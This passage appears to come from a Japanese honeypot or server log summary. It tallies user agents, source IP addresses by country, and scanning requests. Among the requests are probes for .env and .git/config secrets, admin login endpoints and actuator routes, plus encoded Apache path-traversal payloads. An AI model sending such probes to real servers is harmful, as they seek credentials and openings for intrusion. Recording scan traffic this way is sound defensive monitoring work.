23	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
3	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
2		`\x03`
2		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\xfc\x01`
19		`\x16\x03\x01`
1		``
25	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/LGSv`	HTTP/1.1
1	GET	`/NjSR`	HTTP/1.1
2	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/aab9`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/config.php`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/axis2-admin/`	HTTP/1.1
1	GET	`/axis2/`	HTTP/1.1
1	GET	`/axis2/axis2-admin/`	HTTP/1.1
3	GET	`/cdn-cgi/trace`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/jquery-3.3.1.slim.min.js`	HTTP/1.1
1	GET	`/jquery-3.3.2.slim.min.js`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`http[:]//dyn[.]epicgifs[.]net/test6956.php`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.84.129.83	United States
1	4.242.11.234	United States
1	20.150.201.61	United States
1	37.192.102.66	Russia
1	45.56.108.128	United States
1	45.79.128.205	United States
1	45.79.172.21	United States
1	45.79.181.251	United States
19	45.156.128.7	Hungary
10	54.37.79.75	France
5	57.129.23.166	France
2	62.233.50.179	Russia
1	64.62.197.60	United States
1	71.6.134.233	United States
2	78.153.140.219	Russia
2	78.153.140.221	Russia
3	78.153.140.224	Russia
2	83.97.73.87	Germany
8	95.214.235.169	Ukraine
1	103.187.190.3	private ip address
1	103.187.190.6	private ip address
1	141.98.7.187	Bulgaria
2	162.142.125.11	United States
2	162.142.125.213	United States
2	167.71.229.198	United States
2	167.94.145.55	United States
2	172.104.11.34	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
1	172.105.128.11	United States
1	172.200.177.62	United Kingdom
3	184.105.247.254	United States
1	188.215.235.122	Romania
1	191.101.157.148	United States
2	192.155.90.118	United States
1	192.155.90.220	United States
1	193.111.248.5	Russia
2	198.235.24.6	United States
2	205.210.31.55	United States

UserAgent一覧

件数	UserAgent
26	`-`
3	`Go-http-client/1.1`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.10; rv:75.0) Gecko/20100101 Firefox/75.0`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36`
18	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0`
1	`Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1`
26	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
2	`Mozilla/5.0 zgrab/0.x`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`\x03`
2		`\x16\x03\x01\x01H\x01`
19		`\x16\x03\x01`
1	CONNECT	`google[.]com:443`	HTTP/1.1
28	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/HNAP1/`	HTTP/1.1
1	GET	`/Telerik.Web.UI.WebResource.axd?type=rau`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/aaa9`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/admin/config.php`	HTTP/1.1
1	GET	`/api/session/properties`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
1	GET	`/favicon-32x32.png`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/index.jsp`	HTTP/1.1
1	GET	`/query?q=SHOW+DIAGNOSTICS`	HTTP/1.1
1	GET	`/showLogin.cc`	HTTP/1.1
1	GET	`/sitecore/shell/sitecore.version.xml`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/static/historypage.js`	HTTP/1.1
1	GET	`/sugar_version.json`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/v2/_catalog`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wsman`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
3	PRI	`*`	HTTP/2.0